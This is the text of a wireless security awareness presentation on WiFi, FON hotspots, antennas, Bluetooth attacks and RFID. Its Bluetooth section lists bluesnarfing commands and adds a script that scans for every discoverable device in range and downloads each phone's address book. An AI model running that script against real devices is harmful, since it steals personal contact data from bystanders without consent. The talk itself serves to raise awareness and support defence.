Wireless Network Security?
Author: Paul Asadoorian, GCIA, GCIH
Contributions by Larry Pesce, GCFA, GAWN
PaulDotCom

Many are aware that wireless networks, given their open nature, are not secure. Some take precautions, such as running WEP, using a VPN,
and using the newer WPA standards. This presentation aims to raise awareness of attacks that are not easily detectable or preventable on most
wireless networks today.
This is not a “0day” presentation and there are no “new” attacks, merely demonstrations of existing attacks in different scenarios. In fact, the attacks
presented in this paper come from research done as long as a year ago, with the newest “attack” having been presented in early 2006.
It is not the goal of this presentation to tell you not to use wireless networks, but to make you aware of the risk so you can make informed decisions
about your usage of wireless technology and do everything possible to protect your organization’s network infrastructure, data, and the integrity of its
client computers.
Topics
- Why wireless security is increasingly important
- Wireless security misconceptions
- Wireless Attacks
  - Detection & Prevention
- Defensive Wireless Computing
The roadmap for this presentation will first stress the importance of wireless security today. Wireless technology is increasingly everywhere and in
everything. We will then attempt to debunk some of the common wireless security misconceptions. To further stress the vulnerabilities in wireless
networks three attacks will be discussed, demonstrated, and ideas for detection and prevention presented. Finally we will turn our attention to
practical ways in which to *try* to secure your wireless computing environment.
Warning: Wireless Network May Become Unstable
Just a warning (we have permission to perform attacks against the wireless network and clients and will do so in a
responsible manner).
Wifi Everywhere
- Wifi in the home can be done for $39
- Almost all laptops come with Wifi
- New standards such as MIMO (802.11n) will allow for 108Mb/s
Linksys has popularized the wireless-networking-at-home experience by marketing cheap and easy-to-set-up wireless hardware. In today’s market
most laptop computers come with a wireless card built in, including Apple and Wintel machines. This makes it easy to set up wireless in the home: all you
need is a $39 device, and whamo, you are now a Wifi household.
One of the drawbacks of wireless networks is speed; it is not as fast as plugging into the wire. However, new standards are looking to solve this
problem by offering speeds comparable to wired Ethernet. What does this mean? In the home, there will be little incentive to run expensive
cables, which means more people will migrate to wireless.
The Linksys WRT54G is the Swiss army knife of Wifi: you can add battery packs and all sorts of other fun stuff (some of which you will see in this
presentation). A battery pack lets you take your AP wherever you want to go.
Take Your AP With You!
We’ve estimated that you can get 3.5 hours with 8 AA batteries.
Resources:
- “Linksys WRT54G Battery Power Guide”
Wireless is in everything
- More devices are using Wifi:
  - Cell phones
  - Digital cameras
  - Printers
  - PDAs
  - Video game controllers
  - Televisions
  - Speakers
  - Refrigerators
Wifi technology can be found in many popular consumer electronics devices that are permeating the market. Your digital camera has Wifi so it can
talk to your Wifi-enabled printer (because I guess plugging in a cable is too much work for the average consumer). Nintendo has released the Wii (W-
ee), which uses wireless controllers (Bluetooth, in the Wii’s case) - don’t forget the XBOX 360 wireless controllers!
Depicted here are wireless extensions for your TV (to get a wireless HD signal or display pictures on your TV) and your refrigerator, you know, so
you don’t miss your favorite show while cooking or grabbing a snack.
Wireless In Cell Phones
- Useful to drain battery
- Imagine 802.11n on a cell phone!
- Kind of a cool thing in a pinch
  - Best Buy
  - Emergency War Driving
Cell phones are now featuring wireless technology, allowing you to browse the web and check email wherever you can find a hotspot (we’ll discuss
hotspots a little later on). This technology is useful for draining your battery, and 802.11n isn’t going to help things (in fact, I envision flames shooting
out of the early models). It does come in handy:
- While standing in Best Buy one day I noticed that they had a bench of computers set up, most of which looked like customer computers being worked on by
the crack team called “Geek Squad”. I also noticed that they were plugged into WRT54G devices, which meant I smelled an open Wifi
network. So while waiting, impatiently, I decided to conduct an experiment. I fired up the Wifi on my phone and saw the wireless networks “best
buy” and “geek squad”. I connected to the “geek squad” open SSID, and bam, I had an RFC1918 address. I didn’t go any further, but you can use
your imagination from here.
- Sometimes I get really bored on my drive home from work and feel the need to do a war drive. I don’t always have all my war-driving gear on
board, so for a quick fix I enable Wifi on my cell. I am still entertained by some of the SSIDs that I find, such as one near my house labeled
“redneckheaven”. (Insert dueling banjos music here.)
Takes Cool Pictures Too
This page left intentionally “W00T”!
Wifi Everywhere: FON
- “Global hotspots” allow members to access open wireless networks
- Most do not provide encryption
- Three different access models:
  - linus
  - gates
  - alien
- Read more at
FON is an interesting social networking concept (and I mean that in the techie networking way, and the social networking way). You can buy a
wireless access point from FON for as little as $20. The catch is that once you set it up, you have to share it.
The concern with FON, and other setups, is that they typically do little to secure the wireless network. This leaves you, and anyone connecting to
you, vulnerable to attack.
FON also uses a modified Linksys WRT54G wireless router.
Wifi Everywhere: Open Hotspot
- WRT54G-based Wifi Hotspot distros:
  - EWRT
  - Chillispot - Runs on OpenWRT
  - WifiDog - Also runs on OpenWRT
There are many open source projects which implement “captive portal” technology to create an open wireless network. The three above all
run on a WRT54G wireless router, with EWRT even having its own firmware that you install directly on the router. Chillispot and WifiDog run
on OpenWRT, a very popular open-source operating system designed specifically for the WRT54G platform.
The basic premise is that you run an open wireless network. Once a client connects to the network it gets an IP address from DHCP. When the
user opens a web browser they are automatically taken to a login page no matter which web site they enter in the URL bar of the web browser.
This can be accomplished in a few different ways, such as DNS spoofing (the router’s resolver answers every query with the portal’s address) or
destination NAT’ing all port 80 traffic to the portal until the client has logged in.
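As an added example (not from the presentation, and not Chillispot’s or WifiDog’s own code), here is the destination-NAT variant of that redirect as a set of iptables rules for an OpenWRT-style router. It prints the rules instead of applying them, so it can be read and tested on any machine; the interface name br0, the portal address 192.168.1.1:2060 and the firewall mark value 2 are assumptions.

```shell
#!/bin/sh
# Added example: iptables rules for a destination-NAT captive portal on an
# OpenWRT-style router. Not from the talk or from Chillispot/WifiDog.
# Assumptions: wireless clients arrive on br0, the router itself serves the
# login page on 192.168.1.1:2060, and firewall mark 2 means "authenticated".
LAN_IF="${LAN_IF:-br0}"
PORTAL_IP="${PORTAL_IP:-192.168.1.1}"
PORTAL_PORT="${PORTAL_PORT:-2060}"
AUTH_MARK=2

# Rules are printed, not executed, so the logic can be read and tested on a
# box without iptables or root. Pipe the output into sh on the router to apply.
portal_base_rules() {
    # Chain that marks traffic from clients that have logged in. mangle
    # PREROUTING runs before nat PREROUTING, so the mark is visible below.
    echo "iptables -t mangle -N portal_auth"
    echo "iptables -t mangle -A PREROUTING -i $LAN_IF -j portal_auth"
    # Unauthenticated clients may still resolve names (the router's own DNS
    # answers, so this is INPUT traffic, not FORWARD). Without this the
    # browser never gets far enough to be redirected.
    echo "iptables -t nat -A PREROUTING -i $LAN_IF -p udp --dport 53 -j ACCEPT"
    # Any HTTP request from an unmarked client is rewritten to the portal.
    # This is what sends the user to the login page no matter which site
    # they typed.
    echo "iptables -t nat -A PREROUTING -i $LAN_IF -m mark ! --mark $AUTH_MARK -p tcp --dport 80 -j DNAT --to-destination $PORTAL_IP:$PORTAL_PORT"
    # Everything else from an unmarked client is dropped rather than
    # forwarded, so a client cannot skip the portal via HTTPS or a VPN.
    echo "iptables -A FORWARD -i $LAN_IF -m mark ! --mark $AUTH_MARK -j DROP"
}

# Called by the portal after a successful login: mark this client's traffic
# so the DNAT and DROP rules above no longer apply to it.
portal_allow_mac() {
    mac="$1"
    case "$mac" in
        ??:??:??:??:??:??) ;;   # shape check only; iptables validates the hex
        *) echo "portal_allow_mac: bad MAC '$mac'" >&2; return 1 ;;
    esac
    echo "iptables -t mangle -A portal_auth -m mac --mac-source $mac -j MARK --set-mark $AUTH_MARK"
}

# Stand-alone demo: base rule set, then one client authorized.
portal_base_rules
portal_allow_mac 00:0F:DE:CF:4D:D7
```

Authorizing by MAC (or IP) is only as strong as the attacker’s inability to copy it: anyone who sniffs the address of a client that has already logged in can clone it and walk through the portal, which is the same “open network, no real protection” point the rest of this talk keeps making.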
Add Gigantic Antennas!
- Wireless for the whole neighborhood
There are many different antenna hacks for the WRT54G. For more information on building antennas see:
- Many sample chapters from the “Wifi Toys” book on this site, including excellent information on how to build your own cables and antennas.
It threatens your ISP’s business model
- Sharing your Internet connection cuts into ISP profits (they hate it when that happens)
- Cox, local ISP, recently notified all customers about the dangers of open WiFi:
  “Our installers enable these built-in security features (like SSID and WEP encryption)”
  - Read more at
We’ve all done it at one point or another: connected to someone else’s wireless network to use the Internet (sometimes not even on purpose!). So why
purchase your own Internet connection when you can just use someone else’s? ISPs obviously have a huge problem with this, and some, as seen
above, put forth marketing campaigns that are aimed at people’s security fears. In reality, they are trying to save their business.
If they truly cared about security they would not offer “SSID” and “WEP” as potential security measures: an SSID is a network name, not a secret
(hiding it stops nobody with a sniffer), and WEP’s encryption had been practically broken for years by the time this notice went out.

- Build your own antenna to increase wireless range
- Requires tools, mechanical skills
- Chili & Pringles cans are most popular
  - Who wants to eat an entire can of Chili anyway?
- Nobody is safe in my neighborhood
Antennas are fun, cheap, and easy to make. They can really boost signal so you can pick up your neighbor’s Wifi from afar.
For the Anti-do-it-yourselfer
- CompUSA brand 9 dBi Antenna for Linksys WRT54G - $50
- 12 dBi “Wireless Garden Super Cantenna Wireless Network Booster Antenna” - $50
- 9 dBi Directional Indoor Antenna - $30
You can buy RF antennas very cheaply now. It was almost a year ago that I started seeing high gain antennas for sale at CompUSA; now the
selection is quite vast. Just go to www.compusa.com and search for “antenna”.
A 12 dBi antenna from CompUSA is now just $50.
From www.netgate.com, you can get a nice indoor/outdoor Yagi antenna for $30.
More Wireless Technologies
- That’s just why WiFi needs to be secure
- Wireless encompasses:
  - Bluetooth
  - RFID
  - Radio Waves
Radio waves: 900MHz cordless telephones, pagers, baby monitors, video surveillance and security systems.
Taco Bell Takeover
“Taco Bell Takeover After weeks of messing with the frequencies of a nearby Taco
Bell, we decide to film ourselves messing with ourselves. Just so we could witness
the employees’ reactions to the prank. RBCP and a neighbor of his drove to Taco
Bell to place an order while RijilV and Is0tek stayed behind to mess with their order.”
As wireless becomes more popular, so do opportunities for hacking. In the above example a team of hackers hijack a Taco Bell drive-through and
inject audio into the drive-through radio system. There are many funny moments, such as when the manager comes out and scours the parking lot
looking for the offenders, stating, “They have to be within 50 feet!”.

Bluetooth - The New/Old Frontier
- Bluetooth suffers from many insecurities as well
- Widely available on cell phones, mice, and keyboards
- Class 1 can travel up to 100 meters (unamplified)
Bluetooth hacking is becoming more popular, and so are Bluetooth devices. Many talks at hacker conferences focus on attacking and exploiting
Bluetooth. Above is a Bluetooth rifle, first showcased at Defcon in 2004. In recent tests, they have detected over 20 Bluetooth devices from more
than half a mile away!
* Bluetooth wireless IDS was invented after developers grabbed a list of a CEO’s contacts using Bluetooth hacking tools.
For the not-so-mechanically inclined
- Bluetooth can go far despite popular belief
- They even make a Bluetooth dongle with an external antenna! ($40)
- Or go extreme!
Bluetooth devices use the same spectrum (2.4GHz) as Wifi, and therefore all of the antennas, and antenna-building techniques, are similar. The
cost of these devices is steadily dropping. CompUSA (in all its glory) offers a $40 USB dongle with a built-in external antenna.
For more extreme Bluetooth goodness, you can go to www.wardrivingworld.com and pick up +12 dBi antenna kits for around $140.
Bluecasing/Bluesnarfing
- Bluetooth relies on a PIN to provide security
  - Typically the default is “0000”
  - I think that was the combination to my luggage (I changed it from 1234)
- There are numerous tools and attacks that allow you to:
  - Download address book
  - Change address book
  - Delete address book
  - Make phone calls
  - Listen to phone calls
Somehow, somewhere along the line, it was thought that a “pass key” of “0000” was some kind of security measure. Granted, it would be difficult
to enter even an 8-character, mixed-case alphanumeric password into a Bluetooth headset.
Bluesnarfing can be a dangerous attack. A particular person’s cell phone call history or address book could be useful information, especially if it is
the CEO’s cell phone.
It’s Easy!
- All you need is
  - Laptop with CD-ROM
  - A USB Bluetooth dongle
  - Auditor boot CD
- Then go download the following tutorial:
Attacking Bluetooth devices is quite easy. The above video tutorial is very good, and shows you all the commands you will need:
hciconfig hci0 - Similar to “ifconfig” but for Bluetooth adapters; shows the state of your local adapter.
hcitool scan hci0 - Lists the discoverable Bluetooth devices in range, including their addresses (the Bluetooth equivalent of a MAC address).
rfcomm bind /dev/rfcomm0 00:0F:DE:CF:4D:D7 1 - Binds /dev/rfcomm0 to the remote device with that address on RFCOMM channel 1; the link is
only established when a program opens the device.
rfcomm connect /dev/rfcomm0 00:0F:DE:CF:4D:D7 10 - Establishes an RFCOMM connection to channel 10 on that remote device and holds it open.
bluesnarfer -i -b <MAC> - Queries device information from the phone at <MAC>.
bluesnarfer -r 1-100 -b <MAC> - Downloads phone book entries 1 through 100 from that phone.
The hciconfig tool is useful to see the state of your Bluetooth adapters. hciconfig hci0 reset is useful too, as sometimes bluesnarfer or btscanner
will leave your Bluetooth adapter in a “funky” state (no, not Rhode Island either).
To make bluesnarfer work with the default code:
1. Leave /etc/bluetooth/rfcomm.conf empty - bluesnarfer will do everything you need.
2. mkdir -p /dev/bluetooth/rfcomm
3. mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0 (a character device; major number 216 is the rfcomm driver)
4. run bluesnarfer
5. profit?
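The same sequence as one script, added here as an example (it is neither the talk’s nor the bluesnarfer project’s code). It parses `hcitool scan` output into address/name pairs and runs the setup, scan and per-device steps above. With BT_DRY_RUN=1, the default, every command is printed rather than executed and a constructed scan result is used, so it runs on a machine with no Bluetooth adapter; the three device addresses, the adapter name hci0, and RFCOMM channel 1 are assumptions. Only run it for real against devices you are authorized to test, as the talk itself does.

```shell
#!/bin/sh
# Added example, not from the talk or the bluesnarfer project: the manual
# hciconfig/hcitool/rfcomm/bluesnarfer sequence as one script. Parses
# `hcitool scan` output into address/name pairs and runs the per-device steps.
# With BT_DRY_RUN=1 (the default) commands are printed instead of run and a
# constructed scan result is used, so it works without a Bluetooth adapter.
BT_DEV="${BT_DEV:-hci0}"
BT_DRY_RUN="${BT_DRY_RUN:-1}"

# Constructed sample of `hcitool scan` output; the addresses are made up.
SAMPLE_SCAN=$(printf 'Scanning ...\n\t00:0F:DE:CF:4D:D7\tJeffs Phone\n\t00:11:22:33:44:55\tNokia 6310i\n\t00:1A:2B:3C:4D:5E\tBluetooth Car Kit')

# Print the command or run it, depending on BT_DRY_RUN.
run() {
    if [ "$BT_DRY_RUN" = 1 ]; then echo "$*"; else "$@"; fi
}

# Keep only scan lines that carry a Bluetooth address (17 characters, hex
# pairs separated by colons) and emit "ADDRESS<TAB>NAME".
parse_scan() {
    awk -F'\t' 'length($2) == 17 && $2 ~ /^[0-9A-Fa-f][0-9A-Fa-f](:[0-9A-Fa-f][0-9A-Fa-f])+$/ { print $2 "\t" $3 }'
}

# One-time setup from the slide: bluesnarfer wants the legacy rfcomm device
# node (character device, major 216) and an empty rfcomm.conf.
bt_setup() {
    run mkdir -p /dev/bluetooth/rfcomm
    run mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
}

# Reset the adapter first (bluesnarfer and btscanner can leave it in a bad
# state), then inquire for discoverable devices.
bt_scan() {
    run hciconfig "$BT_DEV" reset
    if [ "$BT_DRY_RUN" = 1 ]; then
        printf '%s\n' "$SAMPLE_SCAN" | parse_scan
    else
        hcitool -i "$BT_DEV" scan | parse_scan
    fi
}

# Per-device steps: bind /dev/rfcomm0 to the target on channel 1 (the channel
# the tutorial uses; real phones differ, check with `sdptool browse <addr>`),
# read device info, pull phone book entries 1-100, then release the binding.
snarf_one() {
    addr="$1"
    run rfcomm bind /dev/rfcomm0 "$addr" 1
    run bluesnarfer -i -b "$addr"
    run bluesnarfer -r 1-100 -b "$addr"
    run rfcomm release /dev/rfcomm0
}

# Stand-alone demo: set up, scan, and walk every device found.
bt_setup
bt_scan | while IFS="$(printf '\t')" read -r addr name; do
    echo "# $name ($addr)"
    snarf_one "$addr"
done
```

The parser is the part worth keeping even if you never run the rest: `hcitool scan` only reports devices that are in discoverable mode, so an empty result from it means nothing about what is actually in range (see Redfang later in the deck).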
Fun With Bluesnarfing
Above you can see some of the bluesnarfing tools in action.
More fun bluetooth tools
- btscanner - “Kismet-like” interface for scanning the air for Bluetooth devices
  - Denotes which phones are vulnerable and what they are vulnerable to
- Car Whisperer - Allows you to inject and/or record audio on certain Bluetooth devices
  - Headsets
  - Bluetooth enabled cars
btscanner is a great tool that will look for all Bluetooth devices in range. You can often see all sorts of information about a
device, such as make/model, the “name” string (which sometimes leaks even more information about the device, such as
“Jeff’s Phone”), and whether or not it is vulnerable to known Bluetooth attacks. In that respect, it’s almost like a Bluetooth vulnerability
scanner.
Car Whisperer is an attack suite which allows you to scan for vulnerable Bluetooth devices and inject audio. It works because many hands-free
kits and headsets ship with a fixed default passkey (the “0000” problem from the previous slides) and will pair with any device that presents it.
Some cars have integrated Bluetooth, which could allow an attacker to inject audio into, or record audio from, the car! This also works with
some models of Bluetooth headsets. See the following link for more information:
http://trifinite.org/trifinite_stuff_carwhisperer.html

Bluetooth Demo
“All you bluetooth are belong to us”
Well, not really, but it sounds cool :)

More fun bluetooth tools
- Redfang - Allows you to brute force the MAC address to find non-discoverable devices
- T-BEAR - The Transient Bluetooth Environment AuditoR allows for the same
- WRTSL54GS - Linksys WRT54G with a USB port
  - Support for Bluetooth
  - Fun possibilities
Redfang is an interesting tool. It tries to solve the address problem by brute forcing the device address: it probes each address in a range you
give it and reports the ones that answer, which finds devices that are not in discoverable mode. Sweeping the full 48-bit space is not feasible, so
in practice you narrow the range to a known manufacturer prefix (the first three bytes of a Bluetooth address are the vendor OUI, exactly as with
Ethernet MACs). Not the most efficient solution, but if you are patient this is an option.
T-BEAR is another Bluetooth hacking suite, similar to bluesnarfer and redfang.
The WRTSL54GS presents a potential platform for Bluetooth hacking because it provides a USB port. The BlueZ Bluetooth Linux drivers have been
ported to OpenWRT, so look for good things to come.
RFID
- Radio Frequency IDentification
- Anyone who has ever bought clothing has experienced RFID
- Most operating in the 13.56MHz spectrum
  - Long range RFID devices can operate in the 2.4/5GHz spectrum
- Used in everything from people to packages
RFID is gaining popularity both in practical usage and in the hacking community. Pay tolls, gas stations, department stores, warehouses,
passports, and even humans are using RFID as a method of identification.
RFID also brings privacy concerns; see the EFF’s RFID page for more information.
